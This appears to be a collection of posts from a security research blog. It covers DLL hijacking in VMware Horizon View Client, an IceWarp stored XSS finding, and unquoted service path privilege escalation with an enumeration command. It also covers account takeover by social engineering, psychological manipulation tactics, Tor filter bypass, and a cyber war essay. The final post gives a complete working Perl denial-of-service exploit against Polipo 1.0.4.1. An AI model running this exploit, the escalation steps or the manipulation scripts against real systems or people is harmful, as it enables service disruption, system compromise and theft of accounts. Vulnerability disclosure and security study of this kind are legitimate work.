VMWare Horizon View Client <= 5.4 DLL Hijacking

During one of the pentest assignment i had to perform security assessment for VMWare Horizon View Client, since it’s native windows application the attack vectors are different than normal web apps. I started looking at the memory then traffic then registries found nothing, i was at a total loss…. Fortunately since it’s a native application it must require some dlls, so there are pretty good chances that developers might forgot to explicitly call dlls via complete path, what does that mean ? So lets say an application requires abc.dll and it just calls it by referring call abc.dll windows will look for abc.dll in following order:-

  • The directory from which the application loaded.
  • System directory (C:\Windows\Syswow64).
  • System directory (C:\Windows\System32).
  • The 16-bit system directory (C:\Windows\System).
  • The Windows directory (C:\Windows).
  • The Current Directory.
  • Directories that are listed in the PATH variables.

I fired up process minitor with following rules:-

Next i started the application to see which dlls are missing.

So As we can see that Trutil.dll is required by the application and it’s clearly missing

Once the application is launched we will get reverse shell….sweet!!!

 

 

ICEWARP Multiple Clients, Persistent Cross Site Scripting (XSS)

[Re-post] Original Post, posted on: 15th Feb, 2014 on Xc0re blog.

While going through the Icewarp client I found that  it is possible to inject malicious HTML Element tags into the email and cause a Cross site Scripting (XSS) payload to be executed.

The versions that I tested on, were  :

  • 11.0.0.0 (2014-01-25) x64  (http://demo.icewarp.com/)
  • 10.3.4

————–

The details about the POC are as follows :

It was observed that the ICEWARP Client Version 10.3.4 is vulnerable to tag as well as tag.  Any attacker can create a specially crafted message and inject it into the Signature and as soon as the signature is loaded it will execute the XSS payload.

The Latest ICEWARP Client version 11.0.0 was tested on ICEWARPs own website : demo.icewarp.com and was observed that it filters the tag but does not filter the tag thus allowing the injection of malicious payload into the Signature portion and as soon as the signature is selected , it executes the payload. On further testing it was found that the vulnerability found in this version  can not qualify as a complete persistent vulnerability but in order to attack one has to use social engineering for the person to paste and execute.

Once the XSS payload was embedded , it always executed when the compose email was clicked but once the email was saved as draft , the payload disappeared.  It was noticable that in the signature box when we embedded >alert(1); , it got filtered immediately and never carried to the compose email but with Embed and Object tag it did execute on the compose email level.

Proof Of Concept
=================

Can be found here:—–

 

Unquoted Service Path Privilege Escalation

During pentest engagement we often manage to get a shell (usually it’s enough to prove your point) but what if one can truly get a complete hold of system ?

So there are tons of privilege escalation techniques out there which includes exploiting kernel level bug, mis-configurations so on and so forth.

One of the ways to get elevated access is to exploit unquoted service paths of services running under high privileged user such as administrator or system account

The concept behind unquoted service is service path name contains white space windows assumes that anything before white space is the binary location and anything after that is argument, if it fails to to locate any binary there then it moves on to next directory defined in service path name, to make it more clear lets take a look at below example:-

C:\Program Files\Company Name\AppName Version\App_Binary.exe

when the service starts windows will first look for Programs.exe in C:\ if it does not find any binary named as Program.exe then it will look for Company.exe again if it finds any binary named Company.exe windows will execute it instead of orignal binary i.e App_Binary.exe

So in order to exploit this scenario following conditions must meet:-

1-Service running under high privileged account i.e administrator/system

2-Service path must contain white space

3-One must have write access to directories of the service/app.

For demo purpose Foxit PDF Reader version 7.0.6.1126

Download Link:- http://www.oldapps.com/foxit_reader.php?old_foxit_reader=15897?download

The following screenshot shows that we already have a limited access to system

The following wmic query stolen shamelessly from internet can help in identifying unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

with the help of cacls utility that we can enumerate permissions, which in our case provides append rights to unprivileged user which means one can create files in that directory.

Uploading file to directory….

Once the service is restarted it will execute our binary instead of intended one and provide us with elevated privileges.

 

Social Network Information Harvesting (SNIH)

Social Networks ! For those people who do not know about the social network , what it is and what this blog post is all about, well, here is a quick introduction.

Social Network is

People share their personal or business information freely on these websites. Though the privacy policy is pretty customizable and one can exactly show what one wants and hide what one does not want people to see. Despite of all the security and the privacy, information can get leaked. Many of these social networks constantly change their privacy policies and at one point when u upload a picture it is automatically set to your privacy settings and at another time, its public for the world to see, You constantly have to check again and again whether the privacy of the material is public or not. For example: We performed a controlled check through Facebook to prove our theory and what happened was that most of our friends profile pictures were public and when we contacted them, so they were all saying the exact same thing that the last picture they uploaded was private and now this one became public automatically when they uploaded it.

The main point of this discussion is not to find flaws in social networking websites but it is that security gaps are inevitable and all of our information is on these giant networks and for any reason if the information gets leaked, then you are at a loss. Now this is a great thing for Spammers, who harvest email addresses and other personal information.

Social Network Information Harvesting is basically defined as gathering information about people,  available on the these social networks.   Social Network Information Harvesting can be a service for different kinds of people. Law Enforcement, Criminals, Spammers, Hackers, Intelligence.

SNIH can be applied in many scenarios and the repercussions of this can be quite serious, not for the attacker, but the victims.

SNIH Scenario: [The Scenario is based on Facebook]

Usually what SNIH implementer do is that they create a small game or an application for the users to play or access on the Facebook. Most of the applications ask for permissions like email, statuses, friend-list etc. Now if it is a legitimate application then its a blessing but if it is a malicious one then you can say good bye to any privacy set by the user or the Social Network.

Now the information gathered or harvested can be used to find trends for analysis. This analysis is useful to Law Enforcement Agencies. If personal statuses are harvested then one can determine the tendencies in a person. Similarly If people with malicious intent get hold of this information then, the question arises that except for the obvious, Email Spamming, Harvested pictures selling and buying , Personal information Stealing , cell phone numbers harvesting, what else can they do? Well this takes us to our second Scenario ..

SNIH Scenario 2 : [Disclaimer : This Information is for Educational Purposes. We will not be held responsible for any misuse of this information]

In this scenario we will see an attack that can be carried out by hackers against the innocent users. Though due to two factor authentication this attack might not work but most of us do not opt for two factor authentication.

The attack is on some users email address. Usually when we go to “forget your password”, the system asks us a secret question, which we have to answer in order to reset our password. Now if the hacker goes to some targeted users email and does the above mentioned procedure and for example the secret question is : my favorite pets name. Keep in mind that this account was made some years back and the person doesn’t even remember the question he or she kept, let alone the answer. Now comes the part where a little social engineering would help alot. The attacker goes on Facebook and if he or she knows the person who is targeted then its a walk in the park, as most of the users information is shown on his or hers profile page or home page, but in this case he would have to ask him or her for the answer. Now if the person is a stranger, what the attacker has to do is to add the target user and start a conversation with him or her and between the chat, after a day or so, he can casually ask about pets and other stuff and then slowly ask : I just bought a dog, what name should I give it  and most probably in the users mind , in his subconscious, there is an 80% chance that he or she would tell you the same name. Once the attacker gets the hold of the answer, he just has to go to the email providers account and enter the answer and BOOM ! He is in !

Now what exactly happened was that the attacker used the information available on one social network against another network. The example above requires a little bit of social engineering but usually the questions are my aunts name etc and that can easily be extracted from the information provided by the user on his profile.

To conclude, it is safe to say that Social Network Information Harvesting is wrong because it doesn’t matter if the law enforcement agencies use it or any other people with malicious intent use it, the point is that the user doesn’t know that the information is being harvested. This is in itself a crime whether Law Enforcement is using it or any other person is.

[This is a re-post of the original, posted on 20th of March, 2013, on Xc0re blog.]

Psychological Warfare

Human Beings are stupid by default ! Human Stupidity never fails to amaze any one. We do very very stupid things , unknowingly of-course. This article is about how hackers or any one can tap into the human mind and take advantage of it in every way possible , usually called exploitation. This is either taught or some have this talent by birth for example people like Kevin Mitnick.

Before writing this blog post I just read a tweet on my Twitter Bot that “… do not worry about the Facebook cancellation email” , usually sent by hackers , to fool the innocent Facebook users in giving off their username/password to the hacker. It kept me thinking that why does this happen , why do people fall prey to such scams ! Even if they are technical or not ,they fall for it.Why does this happen?

For an introduction, I would like to say that usually this happens because the hackers know your weaknesses and by you  I mean every body. Hackers exploit these weaknesses to gain username/passwords and other information , usually called Social Engineering ! This talent can be weaponized and used to overthrow governments , start wars , financial gain etc. Once this talent is weaponized and used , it is called Psychological Warfare.

Psychological Warfare is actually mind games on steroids ! The applications and scope of Psychological warfare is broader to an exponential level.  Now I would tell you the process of psychological warfare used by hackers , a shopkeeper , Governments , Military etc .

Exploiting Human Selfishness

Human beings are very selfish ! Once a great man , who is my teacher as well as a very good friend argued that human beings are very selfish ! They do nothing selflessly and I was against the argument and gave many valid points as loving my family or my parents , giving stuff in charity etc so how is it not a selfless act , I don’t get any thing in return. He smiled and said , doing charity helps your conscience to be at peace. You love your parents because it gives you satisfaction. You don’t do any thing that doesn’t give you satisfaction, hence its selfish at some level. Well my point being is that human beings are selfish.  Every one has created his/her world around him/her and they just want to gain any thing and every thing from it.

Coming back to the topic , to how this is exploited. A simple example , every one likes free stuff , a hacker throws a USB flash disk on your door step or in your lawn , one would definitely pick it up and bring it home, well from a hacker’s perspective , any virus lurking in the usb will be executed and the computer would get infected and the usernames and passwords for your facebook , yahoo , hotmail etc would fly off to the hacker. Now in the second example as I mentioned earlier , the current scam for facebook cancellation message in the inbox . Why is everybody clicking on the link and getting hacked? Now here is a thought process that would start in my mind if I didn’t know about this , as soon as I would get this message I would say ” Niaah dude , its so fake ! ” and close the message window. Then after an hour or so I would think , what if the message was legit ! I mean what ever any one is saying , they didn’t get this message , I did!!! My Facebook account would be deleted , and I would be in loss ! The hell with it , I just have to goto the link and get it over with. After that I go onto the link and get hacked happily , but  who cares  atleast I saved my account from cancellation , so what if I got hacked but at least it would not get cancelled.

I hope my dear readers got the Idea !

Exploiting The Human Ego

You must have heard the sentence , ” I am right !! “! Me , Me , Me , I don’t care who you are and what your saying , I am right 100 percent. You must have seen your Bosses , Elder siblings , Teachers  etc , giving these statements. Now what is the best way to turn a no to a yes , in a Boss’s case ? You say : “Sir you are the best boss ever , what ever you say is right but if , though I don’t know much compared to you. Your knowledge is much more , but if you could accept blah blah blah , it would be great. I so want your input in this blah blah ! With out your input this blah blah is nothing. Please accept this !! ” There is a 80 Percent chance , No would change to a Maybe and 60 percent chance that No would change into a YES !!! Every one loves an Ego boost !

Hacking an account using social engineering and this technique.

Phase 1 :

Chat with your victim , for a while , and find a common subject. Once that is done , start the conversation about any controversial thing but never start giving the comments , for example : say .. ” I don’t know what this country is coming to , or what this school is coming to ! ” If the guy is a musician , say something that there aren’t many bands in the school and the whole music scene is getting destroyed and I think your band is the best there is ! The word flattery should come to mind  !  and then you will notice the guy would start giving his comments, because every one has problems , no one is happy with what he has . Just listen to what he says and just say :” Yeh!  man exactly ” etc ..

Phase 2 :

Take his email address , skype etc and him up ! Befriend him to a point where he starts trusting you. Then once done start the social engineering attacks. Install a Trojan onto his pc , and the list goes on !!

See how a little ego boost helped you gain valuable information. The scope of this blog is restricted to the hacker attacks. This can very easily be applied in real world , with real problems.

Intercepting and Messing with the Thought Process

Every one has his own thought process. If you say A in a room of  three people, all three people sitting in the room will start thinking of some thing different. The point is to make them think the same thing as to what you are thinking. This is usually achieved when one doesn’t give time to think and bombards ones own thoughts onto the people listening.

When ever a group of people come into a room , or a classroom , they have their own thoughts . Naturally the human brain is in defensive state and the people in the room do not grasp or accept at first, what the teacher is saying. The key is to get to their level and talk about some thing of interest. Human mind has a vulnerability ! To explain that I would give an example : If two people are sitting in a room and a third person is telling his point of view about A Topic , the other two wont accept at first , but ass soon as he finds a common ground , say C , now they talk about C for 10 minutes. The brain naturally put its guard down , and the weakness is that after that every one would agree on Topic A and also any other Topic !!! So one has to make a common base, the rest is all easy.

The second way to mess with the thought process is not to be that desperate to convince ! Once that happens , if any one listens to what you say , no matter how absurd , will first refute the logic but when they will notice that the argument that you are giving is suggestive but not desperate , they will accept it eventually ! Human mind requires time to process the input.

Exploiting the Lack of Concentration

Every one loves their own thing. For example if one person likes reading love stories , he/she would have zero concentration if they read or are forced to read a sci-fi story. Now this is the thing that the hackers exploit . For example for an English professor , if there is no poetry then its  useless. Now if she gets an inbox message by say the hacker , posing that he is from Facebook etc and the message is so long , with authentic logos and every thing ofcourse  , she would skip every thing and goto the end ,where there would be a link to the hacker’s page and boom , the English professor got , as they say “pwned!”

Lack of concentration is a major factor for these attacks to be so successful.

These were some examples of the Human Weaknesses that are exploited during a Psychological Warfare.  I did not mention how to over throw governments etc because for that I would have to write a whole book ! As this blog is related to Hacking and Security thus I had to stay in scope.

The Cyber War !

Cyber war , a very big word , but some how doesn’t seem so big. Let me first give an introduction to what a Cyber War really is. The introduction is divided into two parts , General perception & Reality !

General Perception :

Most of the people in security field know what cyber war is , the general perception is the perception of a cyber war amongst non technical and non security folks ! In general when ever Cyber is added to any word or any sentence,  the impact that it causes to the the listener’s mind is that “Wow ! what a cool name ! “. It doesn’t matter how critical the sentence or the word is , most people don’t take it seriously and the thought that runs in their minds is “Yeah right, this is kids stuff ! “For example , Cyber Bullying , although the impact in reality is very high but there weren’t any laws against it until recently. People used to think , what the hell cyber space is a joke. Its for children , having fun and messing around.

Similarly if people hear about Cyber War any where , they just don’t take it seriously. In their minds they are like , “Cyber War , huh ? What is that ? What can a Cyber War do to me or my country !? ” , because according to them the definition of a cyber war is just a bunch of hackers who don’t have any social life , attacking web sites of other countries and defacing their webpages and then boasting about it , online or amongst friends.

Then these people watch movies like “Die Hard 4.0” and start thinking about the whole concept as just pure entertainment. Thus destroying the slightest spec of seriousness of the word in their minds.

Reality :

In reality Cyber War is a kind of war that starts in the Cyber Space , followed by air & ground attacks , which are pretty real. As in the current age , where cloud computing is the next best thing. Where next generation network technology is in its adolescent phase , where every thing is controlled through a micro chip, or to simplify it  , every thing is computerized. Nuclear Facilities , Hospitals , Industries , Military defense , Electricity etc are all controlled virtually ! I give the example of the movie “Die Hard 4.0” again , though I am not infatuated with this movie but the concept of Firesale is pretty accurate and as this blog is a reference for the Security people as well as a source of information for non technical people thus giving an example of a movie is better then explaining the whole science ! To sum it up , as every thing is automated and computerized thus attacking the systems on a virtual level and bringing them down and as the country gets crippled , its just a matter of walking and claiming it for oneself .

Ok!  Enough with the introduction now lets make things interesting .  Lets start with Stuxnet!! Stuxnet is a very sophisticated cyber weapon created by the US & Israel  against Iranian nuclear facilities. According to the current press , it caused serious damage to the nuclear plan of Iran. Then the appearance of Duqu Malware which was the successor of Stuxnet. Duqu is quite different from Stuxnet, it has a modular structure like Stuxnet but it isn’t equipped with modules for SCADA systems attack. It is only able to steal information from the host system.In recent years China has come on the maps , as a threat to cyber defense. Google in 2010  blamed china for conducting very sophisticated attacks against the Google’s servers.Recent Anonymous attacks against US as well as other countries is also worth mentioning. Wikileaks is also an important part of whats happening in the cyber world.

As Cyber War is the new trend , thus it is very hard to distinguish between cyber criminals and cyber warriors or cyber soldiers. Cyber Armies are being created with full government backing in many countries. As now Cyber space is considered to be a zone which has the same level of importance as the other zones of potential attacks for example Land , Sea , Air !

A full scale Cyber War resembles a Cold War , where you don’t see much activity as during a normal war but , has the power to break down USSR all over again !!!!

Bypass Online Filter Restriction

Hello again !

Disclaimer: All the material shown on this blog is for educational purposes ! We would not be held responsible for any illegal use of the material by any one !

Usually what happens is that people want to visit a website , which is legit , but some how it is listed in the document given to a naive network administrator and you want to download important stuff from it but what the hell , ITS BLOCKED !!!!!!!!  Your boss , teacher or any person whom you report to , doesn’t want hear stuff about BLOCKED SITES !! Its totally lame to them because they want results and you didn’t deliver. This is a very normal problem faced by many employees , students , etc.

First of all you would have to know a little about “Tunnel” . For that please check out my post about Tunneling because your concept of how tunneling works should be very clear. Today I would tell you how one can bypass these filters.

Tor stands for The Onion Router. This was at first created by the US Naval Research Laboratory a long time ago but then was handed over to the people for commercial use ! Though alot of funding is still coming from the US Govt, and alot of other parties. Which is a pretty good thing because TOR was initially designed for anonymity. The goal was that the users would be anonymous over the internet , thus becoming less of a target for the hackers but back then ” Drive By Malware/Exploits were not in mind or yet discovered.

In this blog I would cover the bypassing of filters so anonymity is not the main focus.Ok  how it works is that first you goto the link and download the Vidalia Bundle . Then once downloaded, install the software and all its components.

After installation run the Vidalia executable. Wait for its icon on the tray of the taskbar, to  the right, to become Green. Once that is done , goto the browser’s network option and add following values in the coinciding variables fields :

Proxy Address : 127.0.0.1

Proxy Port : 8118

Ok now save the settings and get out of the options/settings by clicking on OK !

Now your good to go ! To check whether the proxy is working or not goto : What is my IP (dot) com and see your IP Address. For cross checking whether the proxy is working or not , before adding the proxy settings to your browser goto the above mentioned website and note your IP Address and then compare it with the latter!

Enjoy ! If for instance your ISP or Administrator is smart enough to some how block the tor network, goto the TOR control panel and the click the settings button and then goto the netwok tab, it would be something like this :

If you use a proxy to access the internet , usually which is the case in Universities and Offices so this is the option to give proxy to TOR:

There are a few other techniques you could use to bypass the filters , but this one is by far the best.

Peace.

Polipo 1.0.4.1 Proxy Server Denial Of Service

Polipo is a proxy server that is used with TOR (The onion router) vidalia bundle.If we speak in a very abstract and non technical manner then we can say that Polipo routes user’s browser traffic to the tor network. The user has to just give the port number (8118 in case of TOR).

The software’s download page and the exploit code  is as follows:

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]
# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: [1.0.4.1]
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description  : By sending a crafted POST/PUT request to the server,
 the proxy server crashes !
[*] Exploitation :

#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];

$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

exit;
}

$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";

print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed  \n";
$res = recv($sock,$response,1024,0);
print $response;

exit;

#------------------------------